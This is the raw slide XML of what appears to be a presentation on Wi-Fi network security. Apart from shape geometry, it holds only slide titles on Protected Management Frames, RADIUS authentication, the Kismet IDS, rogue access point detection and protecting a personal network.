                  <a:pt x="0" y="12384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0873" y="2341996"/>
            <a:ext cx="15346253" cy="6541340"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15346253" h="6541340">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15346254" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15346254" y="6541340"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="654134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16643">
            <a:off x="15938595" y="-800967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015482" y="4615869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27060" y="9266293"/>
            <a:ext cx="3644843" cy="3720625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3644843" h="3720625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3644842" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3644842" y="3720625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="372062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29186" y="9467457"/>
            <a:ext cx="2828987" cy="3031386"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2828987" h="3031386">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2828986" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2828986" y="3031385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="303138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32845" y="-397705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5151" y="772993"/>
            <a:ext cx="1690477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Protected Management Frames (PMF)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Freeform 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8887683" y="9467457"/>
            <a:ext cx="1422684" cy="1360603"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1422684" h="1360603">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1422684" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1422684" y="1360603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1360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03886" y="8293823"/>
            <a:ext cx="6321425" cy="4596030"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6321425" h="4596030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6321425" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6321425" y="4596030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4596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88483" y="8293823"/>
            <a:ext cx="6896884" cy="5843542"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6896884" h="5843542">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6896884" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6896884" y="5843542"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="58435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60134" y="8674510"/>
            <a:ext cx="6466926" cy="6408135"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6466926" h="6408135">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6466926" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6466926" y="6408136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6408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87714" y="8513840"/>
            <a:ext cx="6814939" cy="4473078"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6814939" h="4473078">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6814939" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6814939" y="4473078"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4473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47215">
            <a:off x="815035" y="9098544"/>
            <a:ext cx="2045423" cy="1238411"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2045423" h="1238411">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2045424" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2045424" y="1238411"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="12384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827060" y="9266293"/>
            <a:ext cx="3644843" cy="3720625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3644843" h="3720625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3644842" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3644842" y="3720625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="37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29186" y="9467457"/>
            <a:ext cx="2828987" cy="3031386"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2828987" h="3031386">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2828986" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2828986" y="3031385"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30313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4348" y="2355833"/>
            <a:ext cx="15659304" cy="6361592"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15659304" h="6361592">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15659304" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15659304" y="6361592"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="636159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13180" y="4271191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1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1996661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09286" y="4600734"/>
            <a:ext cx="830214" cy="793987"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="830214" h="793987">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="830214" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="830214" y="793986"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="793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1179202" y="2527864"/>
            <a:ext cx="3688900" cy="2682037"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3688900" h="2682037">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3688900" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3688900" y="2682037"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2682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87046" y="7865945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1711104" y="7574782"/>
            <a:ext cx="4024712" cy="3410029"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4024712" h="3410029">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4024712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4024712" y="3410028"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="34100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92066" y="6948693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-1972540" y="4875475"/>
            <a:ext cx="3773807" cy="3739500"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3773807" h="3739500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3773808" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3773808" y="3739500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3739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92066" y="178743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-1415716" y="-321849"/>
            <a:ext cx="3976892" cy="2610287"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3976892" h="2610287">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3976892" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3976892" y="2610287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="26102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4452784">
            <a:off x="578518" y="107253"/>
            <a:ext cx="1193617" cy="722681"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1193617" h="722681">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1193617" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1193617" y="722681"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="7226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-710302" y="8610017"/>
            <a:ext cx="2126967" cy="2171190"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2126967" h="2171190">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2126967" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2126967" y="2171190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="217119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-388539" y="3030540"/>
            <a:ext cx="1650870" cy="1768981"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1650870" h="1768981">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1650870" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1650870" y="1768981"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="176898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161486" y="3218666"/>
            <a:ext cx="7044626" cy="335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59"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="63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Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="8959"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="63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using</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r">
              <a:lnSpc>
                <a:spcPts val="8959"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="63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Radius Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7244686" y="178743"/>
            <a:ext cx="10802661" cy="9929513"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10802661" h="9929513">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10802661" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10802661" y="9929514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="992951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561887" y="5078207"/>
            <a:ext cx="924650" cy="884301"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="924650" h="884301">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="924650" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="924650" y="884301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="884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258581" y="5284049"/>
            <a:ext cx="4108506" cy="2987114"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4108506" h="2987114">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4108506" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4108506" y="2987114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2987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96418" y="7180109"/>
            <a:ext cx="2616260" cy="2397445"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2616260" h="2397445">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2616260" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2616260" y="2397446"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2397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5476976" y="-1147746"/>
            <a:ext cx="4482516" cy="3797913"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4482516" h="3797913">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4482516" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4482516" y="3797913"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3797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55457" y="6138143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6047594" y="1491654"/>
            <a:ext cx="4203071" cy="4164862"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4203071" h="4164862">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4203071" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4203071" y="4164862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41648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96418" y="-389457"/>
            <a:ext cx="4059038" cy="3416972"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4059038" h="3416972">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4059039" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4059039" y="3416973"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="34169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5201247" y="8537823"/>
            <a:ext cx="4429256" cy="2907203"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4429256" h="2907203">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4429257" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4429257" y="2907203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29072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6475945" y="-920983"/>
            <a:ext cx="2368905" cy="2418159"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2368905" h="2418159">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2368905" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2368905" y="2418159"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="24181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6647834" y="5741109"/>
            <a:ext cx="1838653" cy="1970199"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1838653" h="1970199">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1838653" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1838653" y="1970199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="197019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5956" y="188898"/>
            <a:ext cx="8806121" cy="9894518"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="8806121" h="9894518">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="8806121" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8806121" y="9894519"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="989451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180462" y="3909338"/>
            <a:ext cx="7863265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IDS Kismet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50686" y="0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1" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1996661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17736" y="412873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36750" y="1995504"/>
            <a:ext cx="11814499" cy="6645656"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11814499" h="6645656">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11814500" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11814500" y="6645655"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6645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06565" y="6698734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964435" y="428942"/>
            <a:ext cx="1235912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WIFI - Cách hoạt động</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Freeform 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="13106262" y="4203782"/>
            <a:ext cx="7315200" cy="2566970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7315200" h="2566970">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7315200" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7315200" y="2566970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25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370" y="113867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6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1829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62801" y="182467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71957" y="2551627"/>
            <a:ext cx="16744085" cy="7228153"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="22325447" cy="96375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62345" cy="9614735"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11962345" h="9614735">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="11962345" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11962345" y="9614735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9614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2364168" y="0"/>
              <a:ext cx="9961279" cy="9637537"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="9961279" h="9637537">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9961279" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9961279" y="9637537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9637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701474" y="914400"/>
            <a:ext cx="128850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Phát hiện rogue AP giả mạo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190122" y="2383948"/>
            <a:ext cx="7842924" cy="6862559"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4926437" h="4310633">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4926437" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4926437" y="4310633"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="431063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5919" y="2661857"/>
            <a:ext cx="15151330" cy="6306741"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15151330" h="6306741">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15151330" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15151330" y="6306741"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6306741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24726" y="2335119"/>
            <a:ext cx="12373716" cy="6960216"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="6632047" h="3730527">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6632047" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6632047" y="3730527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="373052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960193" y="914400"/>
            <a:ext cx="1436761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Cách bảo vệ mạng cá nhân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27322" y="2453143"/>
            <a:ext cx="2204099" cy="2019757"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2204099" h="2019757">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2204099" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2204099" y="2019756"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2019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9372" y="6718945"/>
            <a:ext cx="1503649" cy="1557451"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1503649" h="1557451">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1503648" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1503648" y="1557451"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="155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6049" y="2943850"/>
            <a:ext cx="3632730" cy="3058098"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3632730" h="3058098">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3632730" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3632730" y="3058098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3058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236115" y="8926138"/>
            <a:ext cx="1585169" cy="959748"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1585169" h="959748">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1585170" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1585170" y="959748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="9597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8633563" y="440829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7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1573407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8064063" y="-1839398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8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6991138" y="5082949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5082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2532414" y="-4264502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3259880" y="-194674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5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7536935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-2508815" y="-3219074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10915">
            <a:off x="15652866" y="562869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-1498575" y="-194674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9907824" y="-140696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269029" y="1372798"/>
            <a:ext cx="11625719" cy="9258300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11625719" h="9258300">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11625720" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162572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004634" y="3332453"/>
            <a:ext cx="3991369" cy="181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9"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10571">
                <a:solidFill>
                  <a:srgbClr val="20A0A4"/>
                </a:solidFill>
                <a:latin typeface="Paytone One"/>
                <a:ea typeface="Paytone One"/>
                <a:cs typeface="Paytone One"/>
                <a:sym typeface="Paytone One"/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9518" y="2960482"/>
            <a:ext cx="2382262" cy="2183018"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2382262" h="2183018">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2382262" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2382262" y="2183018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="218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04618" y="7254344"/>
            <a:ext cx="1503649" cy="1557451"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1503649" h="1557451">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
